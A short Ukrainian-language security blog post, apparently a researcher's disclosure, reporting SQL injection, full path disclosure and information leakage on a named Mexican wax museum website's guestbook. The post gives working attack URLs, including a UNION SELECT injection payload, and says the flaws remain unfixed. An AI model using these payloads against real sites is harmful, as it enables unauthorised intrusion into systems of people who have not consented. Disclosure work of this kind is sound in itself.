Уразливості на www.museodecera.com.mx
16:02 18.09.201018.01.2010
У травні, 18.05.2009, я знайшов SQL Injection, Full path disclosure та Information Leakage уразливості на сайті http://www.museodecera.com.mx. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
18.09.2010
SQL Injection:
http://www.museodecera.com.mx/guestbook/index.php?action=jump&id=-1%20union%20select%20version()
Full path disclosure:
http://www.museodecera.com.mx/guestbook/config.inc.php
Information Leakage:
http://www.museodecera.com.mx/guestbook/index.php
В meta-тегах виводиться інформація про версію PHP, MySQL і веб сервера.
Дані уразливості досі не виправлені.